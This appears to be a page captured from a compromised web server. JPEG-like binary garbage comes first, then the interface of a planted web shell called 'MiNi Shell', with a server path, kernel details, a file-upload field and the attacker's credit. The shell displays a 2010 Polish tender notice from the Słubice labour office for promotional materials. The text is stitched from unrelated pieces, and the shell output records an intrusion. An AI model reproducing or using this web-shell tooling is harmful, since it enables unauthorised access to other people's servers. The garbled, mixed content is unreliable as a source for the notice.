JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100121/18024-N-2010.html

<p class="kh_header"><b>Słubice: Przetarg nieograniczony na wykonanie i dostawę materiałów promocyjnych do Powiatowego Urzędu Pracy w Słubicach, promujących usługi świadczone przez Urząd na rzecz bezrobotnych, poszukujących pracy oraz pracodawców.</b><br>
<b>Numer ogłoszenia: 18024 - 2010; data zamieszczenia: 21.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Słubicach , ul. Piłsudskiego 19, 69-100 Słubice, woj. lubuskie, tel. 0-95 758 3608, faks 0-95 758 3609.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupslubice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na wykonanie i dostawę materiałów promocyjnych do Powiatowego Urzędu Pracy w Słubicach, promujących usługi świadczone przez Urząd na rzecz bezrobotnych, poszukujących pracy oraz pracodawców..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
a)	 4 Banery reklamowe jednostronne typu Roll up z kasetą; gwarancja minimum 24 miesiące,  kasetka z mechanizmem samo nawijającym stabilna, konstrukcja podparta w dwóch punktach trwała grafika, Wysokiej jakości druk wykonany technologią cyfrową, w rozdzielczości 1440 dpi, Podłoże wydruku blockout, CMYK wymiary: 100x200  konstrukcja: aluminium, ilość kolorów 3.
Treść informacyjna do umieszczenia na banerze: logo urzędu pracy, nazwa, dane adresowe, dane kontaktowe, adres strony internetowej, godziny otwarcia, dodatkowo następująca treść Świadczymy bezpłatnie i profesjonalnie następujące usługi:
- pośrednictwo pracy,
- poradnictwo zawodowe,
- organizacja szkoleń,
- metody aktywnego poszukiwania pracy ( klub pracy ),
- udzielanie środków finansowych na tworzenie nowych miejsc pracy,
- udzielanie środków finansowych dla osób chętnych uruchomić działalność gospodarczą,
- organizacja staży i przygotowania zawodowego dla dorosłych,
i wiele innych.
Zapraszamy !!!
b)	Kalendarze ścienne trójdzielne 500 szt.  papier offset 80 g, druk dwukolorowy (szaro-czerwony), język polski,  numeracja tygodni, polskie imieniny, wymiary: wys. 138 mm, szer. 290 mm, trzy odrębne kalendaria po 12 kartek, łączone na spirale,  co zapobiega odpadaniu kalendarium
Główka kalendarza:
Karton ALASKA 350 g, pełen kolor (CMYK) z projektem indywidualnym klienta wymiary: wys. max 230 mm, szer. 320 mm, folia błyszcząca ,opcja płaska, na główce mają zostać umieszczone dwie fotografie ( udostępnione przez Zamawiającego ) oraz dane urzędu, adres i dane kontaktowe, godziny otwarcia
Wykończenie kalendarza:
wymiar całkowity: szer. 320 mm, dł. 830 mm, druk na podkładzie pełen kolor, trzy miejsca na reklamę pod kalendarium o wymiarach szer. 320 mm, wys. 60 mm, całość pokryta folią błyszczącą , opaska z przesuwnym okienkiem, trzy zdjęcia na kalendarzu.
Na kalendarzu ma być także umieszczony tekst: Świadczymy bezpłatnie i profesjonalnie następujące usługi:
- pośrednictwo pracy,
- poradnictwo zawodowe,
- organizacja szkoleń,
- metody aktywnego poszukiwania pracy ( klub pracy ),
- udzielanie środków finansowych na tworzenie nowych miejsc pracy,
- udzielanie środków finansowych dla osób chętnych uruchomić działalność gospodarczą,
- organizacja staży i przygotowania zawodowego dla dorosłych,
i wiele innych.
Zapraszamy !!!.
c)	Długopisy- 500 sztuk- plastikowy z nadrukiem z niebieskim wkładem. Mechanizm automatyczny wciskany Połączenie tworzywa transparentnego z krytym. Powierzchnia matowa, gumowy uchwyt, kolor biało-zielony. Nadruk na długopisie: nazwa urzędu, adres, adres strony internetowej, dane kontaktowe  
d) Wizytówki 4+4 CMYK, papier sztywny, bez przebarwień, wymiar 85x55mm, papier 350g/m2; dwustronne; narożniki prostokątne, matowe, 2000 szt. Przednia strona: Nagłówek górny wizytówki ma zawierać logo urzędu, nazwę i dane adresowe oraz adres strony internetowej, godziny otwarcia. Środek: Imię i nazwisko, stanowisko. Dół wizytówki: telefon kontaktowy, adres mailowy. Odwrotna strona wizytówki następujący tekst: Świadczymy bezpłatnie i profesjonalnie następujące usługi:
- pośrednictwo pracy,
- poradnictwo zawodowe,
- organizacja szkoleń,
- metody aktywnego poszukiwania pracy ( klub pracy ),
- udzielanie środków finansowych na tworzenie nowych miejsc pracy,
- udzielanie środków finansowych dla osób chętnych uruchomić działalność gospodarczą,
- organizacja staży i przygotowania zawodowego dla dorosłych,
i wiele innych.
Zapraszamy !!!
w tym 1000 szt. dla Dyrektora Powiatowego Urzędu Pracy w Słubicach Genowefy Borowiak, Tel. 095 758 36 08, 095 759 09 20, Tel. Kom: 0609795519 fax: 095 758 36 09 meil: dyrektor@pupslubice.pl
oraz 1000 szt. dla zastępcy Dyrektora Roberta Martyn, Tel. 095 758 36 08, 095 759 09 21, Tel. kom: 0781 653 816 fax: 095 758 36 09, meil: zastepca@pupslubice.pl 
e)Smycz  500 sztuk-10 mm, złączka, karabińczyk, rodzaj wykończenia szyta, drukowana techniką sublimacji na taśmie poliestrowej. Kolor zielona, nadruk biały, obustronnie barwiona. Nadruk: Powiatowy Urząd Pracy, ul. Piłsudskiego 19, 69-100 Słubice, WWW.pupslubice.pl, zisl@praca.gov.pl
f) Podkładki pod mysz z nadrukiem- 500 sztuk ; podkładka zgrzewana, 2-warstwowa, format 18x22 cm, wierzch - folia OMP (przystosowana do myszek optycznych), grubość 0,4 mm, spód - antypoślizgowa pianka PCV, kolor szary, grubość 1,2 mm, nadruk full kolor (CMYK), na wewnętrznej stronie folii, zgrzew na grafice. Treść informacyjna do umieszczenia na podkładce: logo urzędu pracy, nazwa, dane adresowe, dane kontaktowe, adres strony internetowej, godziny otwarcia, dodatkowo następująca treść Świadczymy bezpłatnie i profesjonalnie następujące usługi:
- pośrednictwo pracy,
- poradnictwo zawodowe,
- organizacja szkoleń,
- metody aktywnego poszukiwania pracy ( klub pracy ),
- udzielanie środków finansowych na tworzenie nowych miejsc pracy,
- udzielanie środków finansowych dla osób chętnych uruchomić działalność gospodarczą,
- organizacja staży i przygotowania zawodowego dla dorosłych,
i wiele innych.
Zapraszamy !!!
g) Maty na biurko-100 szt; Praktyczny pad biurowy z uchylnym wierzchem i dwunastoma kartami kalendarza 2010 wewnątrz. Format: 18x47 cm, wierzch: uchylna przeźroczysta folia PCV grubości  0,3 mm nadruk na folii: sitodruk (w standardzie - 2 kolory  Pantone; środek:  12 kart z uniwersalnym kalendarium, spód: antypoślizgowa pianka PCV, kolor szary, grubość  1,5 mm.
Pierwsza strona logo urzędu, dane adresowe i nazwa urzędu i dane kontaktowe. Na wewnętrznych stronach informacja o usługach urzędu o następującej treści:Świadczymy bezpłatnie i profesjonalnie następujące usługi:
- pośrednictwo pracy,
- poradnictwo zawodowe,
- organizacja szkoleń,
- metody aktywnego poszukiwania pracy ( klub pracy ),
- udzielanie środków finansowych na tworzenie nowych miejsc pracy,
- udzielanie środków finansowych dla osób chętnych uruchomić działalność gospodarczą,
- organizacja staży i przygotowania zawodowego dla dorosłych,
i wiele innych.
h) Papier firmowy- 4000 szt., A4, druk jednostronny 4+0 CMYK, papier offset 90gr, na papierze o podwyższonej białości na poziomie powyżej 160 wg normy CIE.  W górnym nagłówku logo urzędu pracy, dane urzędu i adres oraz kontakt ( numery telefonów, faksu, meil,), po lewej stronie informacja o świadczonych usługach. Świadczymy bezpłatnie i profesjonalnie następujące usługi:
- pośrednictwo pracy,
- poradnictwo zawodowe,
- organizacja szkoleń,
- metody aktywnego poszukiwania pracy ( klub pracy ),
- udzielanie środków finansowych na tworzenie nowych miejsc pracy,
- udzielanie środków finansowych dla osób chętnych uruchomić działalność gospodarczą,
- organizacja staży i przygotowania zawodowego dla dorosłych,
i wiele innych.
i)	Koperty z nadrukiem szt. 7000; DL ( 220x110 ), samoklejąca, CMYK 4/4, na kopercie nadruk loga urzędu, dane adresowe, na odwrocie informacja o świadczonych usługach.
j) Notesy 500 szt., A5 (148x210mm), 50 kartkowe, papieru ofsetowego o gramaturze 80 gramów zadrukowanych jednostronnie w pełnym kolorze. Nagłówek logo firmy i dane firmy, na dole świadczone usługi. 
k) Torby papierowe z nadrukiem- 500 szt; papier biały gładki 100g, wymiar 40 x 40 x 14 cm, uchwyt papierowy skręcany, przód - logo i nazwa firmy, druga - świadczone usługi i dane adresowe. Nadruk dwustronny dwukolorowy
l) Segregatory 200 szt-  A4 50 mm, zielone, nadruk, mechanizm 2 ringowy typu D, tektura o grubości 2,5 mm, okleina zewnętrzna: druk offsetowy w pełnym kolorze, laminowana folią błyszczącą.
Wyklejka: biała kreda, laminowana folią błyszczącą; 4/0 CMYK, docisk metalowy, okucia owalne, kółko grzbietowe, kieszonka grzbietowa, przód - logo urzędu, tył: nazwa urzędu, adres i dane kontaktowe, świadczone usługi.  
Ł) Teczki ofertowe 500 szt; Format po złożeniu: 220x302x5 mm. Format po rozłożeniu: 623x302 mm. Papier: Karton biały 245 g/m2 Druk: Pełnokolorowy CMYK 4/0. Uszlachetnianie: Lakierowanie offsetowe w standardzie. Sztancowanie z wykrojnika drukarni. Pokryte folia matową, miejsce na wizytówkę. Przód: logo urzędu, nazwa urzędu i dane adresowe, tył: rodzaj świadczonych usług.

Wykonawca zobowiązany jest do opracowania materiałów, układu treści i wizualizacji, grafiki, ich wydruku oraz dostawy do siedziby Zamawiajacego. 
Wykonawca zobowiązany jest przed drukiem uzyskać akcept Zamawiającego układu i treści na zamawianych materiałach..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 79.34.10.00-6, 30.19.97.92-8, 30.19.21.21-5, 30.19.97.30-6, 39.29.41.00-0, 30.19.20.00-1, 30.19.93.10-6, 30.19.97.10-0, 22.81.61.10-0, 22.85.00.00-3, 30.19.95.00-5, 21.21.12.10-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.02.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od wykonawców wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty:
Na podstawie art. 22 ust. 1 ustawy, o udzielenie zamówienia mogą ubiegać się Wykonawcy,
którzy:
- Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, w tym:
- Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia .
- Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
- Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełnienia warunków dokonana będzie na podstawie złożonych oświadczeń, dokumentów wymienionych w SIWZ na podstawie kryterium spełnia/ nie spełnia. Nie spełnienie ww. warunków będzie skutkowało wykluczeniem z postępowania, zgodnie z art. 24 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na podstawie art. 22 ust. 1 ustawy, o udzielenie zamówienia mogą ubiegać się Wykonawcy,
którzy:
- Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, w tym:
- Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia .
- Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
- Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Ponadto należy złożyć:
- formularz ofertowy zgodny ze wzorem stanowiącym załącznik nr 1,
- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
- wypełniony druk :opis przedmiotu zamówienia- zgodnie z załącznikiem nr 2,
- oświadczenie do postępowania o zamówienie publiczne z art. 22 ust.1 i 24 ustawy Prawo zamówień publicznych z wykorzystaniem wzoru - załącznik nr 3,
- zaakceptowany projekt załączonej umowy- załącznik nr 4.
W przypadku, gdy jakakolwiek część powyższych dokumentów nie dotyczy wykonawcy, wpisuje on na dokumencie nie dotyczy i taki dokument dołącza do oferty.

Oprócz oświadczenia i dokumentów, składanych na potwierdzenie spełniania warunków udziału w postępowaniu Wykonawca zobowiązany jest złożyć:

a.	w przypadku, gdy oferta jest podpisywana przez pełnomocnika: pełnomocnictwo obejmujące uprawnienia do składania oświadczeń wynikających z toku niniejszego postępowania.

	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu o którym mowa w SIWZ, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a.	nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem składania ofert; Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty nie mogą być wystawione wcześniej niż wskazano wyżej.

Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w tym przypadku ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wykonawcy działający wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy (art. 23 i 141 ustawy). W przypadku złożenia oferty przez podmioty występujące wspólnie, Zamawiający żąda przedstawienia następujących oświadczeń i dokumentów:
a.	formularz ofertowy - podpisany w taki sposób, by prawnie zobowiązywał wszystkich Wykonawców występujących wspólnie,
b.	pełnomocnictwo osoby ustanowionej do reprezentowania podmiotów występujących wspólnie w postępowaniu o udzielnie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, dokładnie określające zakres umocowania, zgodnie z art. 23 ust. 1 i 2 ustawy.
c.	oświadczenie, o którym mowa w Rozdziale VI. pkt 1. SIWZ złożone wspólnie,
d.	dokumenty, o których mowa w Rozdziale VI. pkt 1, 2 i 3  SIWZ złożony przez każdy podmiot oddzielnie,
e.	pozostałe dokumenty złożone co najmniej przez jeden z podmiotów wchodzących w skład podmiotów występujących wspólnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pupslubice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy 
ul. Piłsudskiego 19
69-100 Słubice
woj. Lubuskie.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2010 godzina 10:00, miejsce: Powiatowy Urząd Pracy - sekretariat- pok. 106-
ul. Piłsudskiego 19
69-100 Słubice
woj. Lubuskie.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com